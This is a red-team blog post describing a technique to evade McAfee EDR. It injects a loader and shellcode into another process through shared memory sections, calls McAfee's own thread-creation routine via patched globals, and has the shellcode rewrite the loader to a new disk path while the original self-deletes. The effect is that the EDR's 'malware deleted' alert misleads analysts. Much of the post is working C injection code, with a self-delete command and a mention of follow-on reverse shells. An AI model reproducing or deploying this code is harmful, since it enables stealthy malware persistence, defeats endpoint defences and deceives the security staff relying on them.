Blending with McAfee [Part-3]

Malware is like a parasite. It likes to sit inside other processes and perform malicious actions from there when possible. This behavior makes it stealthier and harder to detect, because it mostly hides inside legitimate processes. One of the best-known, easiest, and most widely used WinAPI functions for injecting into other processes is CreateRemoteThread (CRT). Because of this, AV/EDR products heavily monitor this API by every possible means, such as userland hooking, event monitoring, and kernel monitoring.

While playing with McAfee EDR, the initial plan was to bypass it and somehow make the CreateRemoteThread API work again, because a normal call to CreateRemoteThread was detected as malicious. We found that McAfee hooks both CreateRemoteThread and CreateRemoteThreadEx but does not hook NtCreateThreadEx in ntdll. We excitedly tried NtCreateThreadEx because it wasn't hooked; however, our payload was detected and deleted every time. We tried every way we could think of to call the CRT API, and failed every time. Below are all the tests we performed:

At this point we know that a call to CreateRemoteThread is not detected when internet/cloud protection is off, and that it is also not detected when the local process handle is used.

if (cloud_protection_on && handle_in_CRT != -1) {
    return process_is_malicious_perform_delete_action;
}
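The condition above can be restated as a small piece of compilable C. This is only a sketch of the behavior observed from the outside, not McAfee's actual logic. The names `crt_call_is_flagged` and `CURRENT_PROCESS_PSEUDO_HANDLE` are hypothetical, and the value -1 assumes the Windows convention that the current-process pseudo-handle is (HANDLE)-1.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumption: on Windows the pseudo-handle for the current process is (HANDLE)-1. */
#define CURRENT_PROCESS_PSEUDO_HANDLE ((intptr_t)-1)

/*
 * Hypothetical model of the observed behavior: a CreateRemoteThread call was
 * flagged only when cloud protection was on AND the target handle was not the
 * local process handle. This does not describe the EDR's real internals.
 */
bool crt_call_is_flagged(bool cloud_protection_on, intptr_t target_handle)
{
    return cloud_protection_on &&
           target_handle != CURRENT_PROCESS_PSEUDO_HANDLE;
}
```

With this model, a call against a remote handle is flagged while cloud protection is on, and a call against the local pseudo-handle, or any call with cloud protection off, is not.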

We tried a few other things to keep the CRT call from being detected but eventually failed. There are a few other working ways to bypass both cloud and adaptive protection and execute our payload in a remote process. However, we insisted on using CRT no matter what obstacles came our way.

How exactly does McAfee EDR react to a CreateRemoteThread API call?

In our loader/payload we dynamically located and called CreateRemoteThread, which prevented McAfee EDR from flagging the loader/payload as malicious at runtime. We delayed the program for about 2 minutes before calling the CreateRemoteThread API. During those 2 minutes nothing happened. After that, CreateRemoteThread executed and the shellcode ran normally in the remote process; however, within 10 to 12 seconds our loader/payload was detected as malicious and deleted immediately. The good thing is that the shellcode was still running.

Abusing this behavior

Note: Before starting, we want to make it clear that this is not a bypass. The alert will definitely be generated, and our payload/loader will still be deleted.

From the above section we know how McAfee behaves when the CRT API is called. There are a few things we can take advantage of.

Our injected shellcode still runs even after the loader/payload is deleted.
There's a time gap between the CRT execution and the deletion of the loader/payload.

So, we came up with a plan to fool the EDR and the analyst (not all 😊). The plan is simple: since the EDR is so powerful, most of us will trust it most of the time. If we look at the logs carefully, they say that the EDR has deleted our loader/payload. If we are lazy, we'll believe it 😊. Our plan starts from here. We simply move our shellcode and the loader into the target process memory, then write the loader to another location on disk before executing the actual shellcode functions, and finally self-destruct the executable. Basically, we're hiding behind the EDR's genuine alert. If we break down our plan:

Loader:

Write shellcode and loader into the target process
Execute CreateRemoteThread
Wait 7 seconds (so that the shellcode can write the loader to another location on disk)
Self-delete from the disk

Shellcode:

Write the loader buffer from memory to disk in a new location
Update the persistence mechanism (if implemented)
Clean up the loader buffer from memory
Run other functionality from the shellcode, for instance a reverse shell

Key Notes:

The loader is written to disk from the shellcode because, even if the loader writes itself to another location and self-destructs, the EDR is going to delete the file newly created by the loader.
An analyst will not find any trace of the loader writing to disk if the loader buffer is written to disk from shellcode running in another process.
The loader self-destructs before the EDR deletes it. The alert is still generated, saying the malware was successfully deleted. Now it depends on the analyst whether to dig into the incident or to believe the EDR.

Implementation

Since we’re playing with McAfee EDR, we decided to use the EDR-Recast technique [EDR-Recast link] as well. Also, to avoid WriteProcessMemory calls, we used the NtCreateSection and NtMapViewOfSection technique to write our shellcode and loader buffer into the remote process.

We created two sections, one for the shellcode and another for the loader buffer. The loader buffer needs to be copied first, then the shellcode, because a few things need to be copied along with the shellcode into the shellcode section. During section creation for the loader buffer, the MAXIMUM_ALLOWED flag should be given because our loader buffer is more than 4K in size.

Then we map the section into both the local and remote processes. After that, the loader buffer is copied to the local section base address. Since both processes share the same section, whatever is copied to the local section base address also appears at the remote section base address.

// CreateSection for payload
SIZE_T actualSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData);
SIZE_T scSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData);
LARGE_INTEGER lScSize = { scSize };
// MAXIMUM_ALLOWED => this flags allows to create section larger than 4K
status = fpNtCreateSection(&hSection,
    SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE | SECTION_EXTEND_SIZE | MAXIMUM_ALLOWED,
    NULL, (PLARGE_INTEGER)&lScSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
if (!NT_SUCCESS(status)) {
    perror("[+] Error on Creating Section\n");
    exit(-1);
}
printf("[+] Section Created\n");
// Map view of section to local process
PVOID localSectionBaseAddr = { 0 };
PVOID remoteSectionBaseAddr = { 0 };
status = fpNtMapViewOfSection(hSection, GetCurrentProcess(), &localSectionBaseAddr,
    NULL, NULL, NULL, &scSize, ViewUnmap, NULL, PAGE_EXECUTE_READWRITE);
if (!NT_SUCCESS(status)) {
    perror("[+] Error on NtMapViewOfSection Local\n");
    exit(-1);
}
//DelayExecution(0x4);
printf("[+] Mapped view to local process\n");
CLIENT_ID pid;
InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);
pid.UniqueProcess = (HANDLE)(a_pid);
pid.UniqueThread = (HANDLE)0;
// Getting handle to target process
fpZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &pid);
if (hProcess == INVALID_HANDLE_VALUE) {
    printf("[-] Invalid Handle Value \n");
}
printf("[+] Got handle to the process %d\n", (DWORD)hProcess);
//DelayExecution(0x6);
// Map view of section to target process
//For shellcode RWX
status = fpNtMapViewOfSection(hSection, hProcess, &remoteSectionBaseAddr,
    NULL, NULL, NULL, &scSize, ViewUnmap, NULL, PAGE_EXECUTE_READ);
if (!NT_SUCCESS(status)) {
    perror("[+] Error on NtMapViewOfSection Remote\n");
    exit(-1);
}
printf("[+] Mapped view to remote process\n");

The same process is followed for the shellcode; however, we need to provide a few pieces of information to the shellcode:

New path where we want to place our loader buffer
Base address of loader buffer in memory i.e., base address of remote section
Size of loader buffer

// [-- We created the section for shellcode but we'll not copy our shellcode
// there's something we need to add before copying shellcode --]
// CreateSection for payload buffer
// Getting payload and payload size
wchar_t payload_addr[0x100] = { 0 };
size_t len = 0;
mbstowcs_s(&len, payload_addr, argv[0], strlen(argv[0]));
wprintf(L"[+] Payload Name %s\n", payload_addr);
//system("pause");
size_t payload_size = 0;
BYTE* buffer = GetPayloadBuffer(payload_addr, payload_size);
SIZE_T p_size = payload_size;
//SIZE_T scSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData);
lScSize = { p_size };
status = fpNtCreateSection(&pHSection,
    SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE | SECTION_EXTEND_SIZE | MAXIMUM_ALLOWED,
    NULL, (PLARGE_INTEGER)&lScSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
if (!NT_SUCCESS(status)) {
    perror("[+] Error on Creating Section\n");
    exit(-1);
}
printf("[+] Section Created\n");
//DelayExecution(0x2);
// Map view of section to local process
PVOID localPESectionBaseAddr = { 0 };
PVOID remotePESectionBaseAddr = { 0 };
status = fpNtMapViewOfSection(pHSection, GetCurrentProcess(), &localPESectionBaseAddr,
    NULL, NULL, NULL, &p_size, ViewUnmap, NULL, PAGE_EXECUTE_READWRITE);
if (!NT_SUCCESS(status)) {
    perror("[+] Error on NtMapViewOfSection Local\n");
    exit(-1);
}
printf("[+] Mapped view to local process\n");
// Map view of section to target process
//For shellcode RWX
status = fpNtMapViewOfSection(pHSection, hProcess, &remotePESectionBaseAddr,
    NULL, NULL, NULL, &p_size, ViewUnmap, NULL, PAGE_EXECUTE_READ);
if (!NT_SUCCESS(status)) {
    perror("[+] Error on NtMapViewOfSection Remote\n");
    exit(-1);
}
printf("[+] Mapped view to remote process\n");
printf("[+] Copying PE to mapped section...\n");
memcpy((void*)localPESectionBaseAddr, buffer, payload_size);

Since we are calling the CreateRemoteThread API, we can pass a parameter (lpParameter) to the thread function (shellcode/StartAddress). However, we need to pass several pieces of information to the shellcode. To solve this, we created the structure “XShellData”, which has 3 members: new_path, mem_loc, and copy_size.

new_path: new path location to move loader buffer
mem_loc: loader buffer memory location
copy_size: number of bytes to copy (size of loader buffer)

A heap buffer is allocated with the size of (shellcode + junks + XShellData). Once the shellcode, junk bytes, and XShellData are copied to the heap, the heap data is copied to the local section address created for the shellcode. Because the section is shared, the shellcode and the XShellData buffer are now visible at the remote section base address as well. Now it’s time to call the CreateRemoteThread API: lpStartAddress is given the remote base address of the shellcode, and lpParameter is given the remote address of XShellData, i.e., remote base address + sizeof(shellcode) + sizeof(junks).

// setting up parameters
char newPath[0x100] = "";
// This is the path where we move our shellcode. This path can be dynamically
// generated or can be encrypted for stealthier.
// TODO: Finding Random Directory with RWX permission
// TODO: Generate Random name for the payload
strcat_s(newPath, "C:\\Users\\Xploiter\\AppData\\Local\\Temp\\test.exe");
strcpy_s(ShellData.new_path, newPath);
ShellData.mem_loc = remotePESectionBaseAddr;
ShellData.copy_size = payload_size;
memcpy((void*)((UINT_PTR)heapAddr + sizeof(buf) + sizeof(junks)), &ShellData, sizeof(ShellData));
printf("[+] Copying payload to mapped section...\n");
memcpy((void*)localSectionBaseAddr, heapAddr, actualSize);
// Patching Global for CRT
DWORD CUTPatchAddr = ((ULONG_PTR)hMfehcinj + CUT);
DWORD CUTPatchBytes = 0x0;
DWORD CRTPatchAddr = ((ULONG_PTR)hMfehcinj + CRT);
pResolveProcAddress("kernel32.dll", "CreateRemoteThreadEx", &procAddr);
DWORD CRTPatchBytes = (DWORD)procAddr;
memcpy((void*)CUTPatchAddr, &CUTPatchBytes, sizeof(DWORD));
memcpy((void*)CRTPatchAddr, &CRTPatchBytes, sizeof(DWORD));

LPTHREAD_START_ROUTINE runME = (LPTHREAD_START_ROUTINE)remoteSectionBaseAddr;
printf("[+] Executing...\n");
//Crafting Remote Thread
CreateUserOrRemoteThread createUserOrRemoteThread = (CreateUserOrRemoteThread)((UINT_PTR)hMfehcinj + CURTFunc);
// param location offset
DWORD param = sizeof(buf) + sizeof(junks);
createUserOrRemoteThread((void*)hProcess, (void*)remoteSectionBaseAddr,
    (void*)((UINT_PTR)remoteSectionBaseAddr + param));
// Self-destruct
// https://stackoverflow.com/questions/1606140/how-can-a-program-delete-its-own-executable/66847136#66847136
// alternatively we can put our binary
// in delete-pending state
char* process_name = argv[0];
char delCommand[256] = "start /min cmd /c del ";
strcat_s(delCommand, process_name);
// Delaying before self-destruct so that shellcode can move the binary to other location
printf("[+] Delaying Before self-destruct...\n");
DelayExecution(0x7);
printf("[+] Attempting to delete itself...\n");
system(delCommand);

Following is the visualization of how shellcode, junks, and XShellData are aligned in memory.
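As a rough illustration of that layout, the sketch below packs three regions back to back and computes the offset at which the parameter block starts. It is a minimal sketch under stated assumptions, not the project's code: the field types of `XShellData`, the 0x100 path length, and the helper names `param_offset` and `pack_layout` are all hypothetical, and the byte arrays in the usage are plain placeholder data.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical field types; the text only names the three members. */
typedef struct XShellData {
    char   new_path[0x100]; /* destination path for the loader buffer */
    void  *mem_loc;         /* address of the loader buffer */
    size_t copy_size;       /* number of bytes to copy */
} XShellData;

/* Offset of the parameter block: it follows the code and the junk bytes. */
size_t param_offset(size_t code_size, size_t junk_size)
{
    return code_size + junk_size;
}

/*
 * Lay out [code][junk][XShellData] contiguously in dst.
 * Returns the total number of bytes written, or 0 if dst is too small.
 */
size_t pack_layout(uint8_t *dst, size_t dst_cap,
                   const uint8_t *code, size_t code_size,
                   const uint8_t *junk, size_t junk_size,
                   const XShellData *data)
{
    size_t offset = param_offset(code_size, junk_size);
    size_t total = offset + sizeof(*data);

    if (dst == NULL || dst_cap < total) {
        return 0;
    }
    memcpy(dst, code, code_size);             /* region 1: code bytes */
    memcpy(dst + code_size, junk, junk_size); /* region 2: junk bytes */
    memcpy(dst + offset, data, sizeof(*data)); /* region 3: parameters */
    return total;
}
```

The same offset, `sizeof(buf) + sizeof(junks)` in the listing above, is what gets added to the remote base address to form the thread parameter.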

Now, in the shellcode, the parameter passed from CRT (the base address of XShellData) is at esp + 8. From there the shellcode parses all 3 members: new_path, mem_loc, and copy_size. It then writes the loader to the new location, after which the rest of its functionality is executed.

Video : https://drive.google.com/file/d/1Tt-BtjzQOSqaBgGw8dhY0gR4SuazXLsy/view

Project Link : https://github.com/RedTeamOperations/Journey-to-McAfee/tree/main/TrueAlert

Conclusion

Almost all EDRs perform behavioral analysis to detect malware, which makes it very difficult for red teamers and threat actors to operate. Most of our favorite techniques are usually detected by AV/EDRs no matter what. It’s quite difficult to bypass EDRs these days; however, we can also perform behavioral analysis on the EDR itself and craft a payload tailored to a specific EDR, as we did in this blog. Also, security analysts shouldn’t fully trust the EDR even though it’s very powerful. Unexpected things usually happen in powerful places.
